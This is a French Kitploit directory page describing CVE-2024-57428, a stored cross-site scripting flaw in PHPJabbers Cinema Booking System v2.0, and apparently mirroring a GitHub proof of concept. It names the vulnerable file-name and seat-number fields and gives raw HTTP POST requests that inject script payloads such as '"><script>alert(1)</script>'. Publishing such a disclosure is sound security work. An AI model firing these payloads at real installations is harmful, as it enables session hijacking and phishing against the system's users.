Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-57428 — CVE-2024-57428 : PHPJabbers Cinema Booking System v2.0 souffre d'un XSS stocké, permettant une injection JavaScript persistante pour des attaques de phishing et de malwares. | Kitploit
Outils/GitHubGitHub/ahrixia/cve-2024-57428
Analyse des VulnérabilitésExploitationExploitation d'Applications WebHameçonnageTests d'Intrusion
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428 : PHPJabbers Cinema Booking System v2.0 souffre d'un XSS stocké, permettant une injection JavaScript persistante pour des attaques de phishing et de malwares.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-57428

Une vulnérabilité de cross-site scripting (XSS) stocké dans PHPJabbers Cinema Booking System v2.0 existe en raison d'une entrée non nettoyée dans les champs de téléchargement de fichiers (event_img, seat_maps) et les configurations de numéros de sièges (number[new_X] dans pjActionCreate). Les attaquants peuvent injecter du JavaScript persistant, conduisant à du phishing, à l'injection de logiciels malveillants et au détournement de session.

Paramètre vulnérable : event_img et seat_maps's file name

Impact :

Le XSS stocké est plus grave que le XSS réfléchi, car il affecte tous les utilisateurs qui accèdent au contenu injecté. Il pourrait être exploité pour des attaques de phishing persistantes, le vol de session ou l'injection de logiciels malveillants sur une large base d'utilisateurs.

Exploit - Preuve de concept (POC)

Cross-Site Scripting (XSS) stocké

XSS stocké par upload de fichier

Payload : \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

Numéro de siège de salle de cinéma

Payload : "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Télécharger l’outil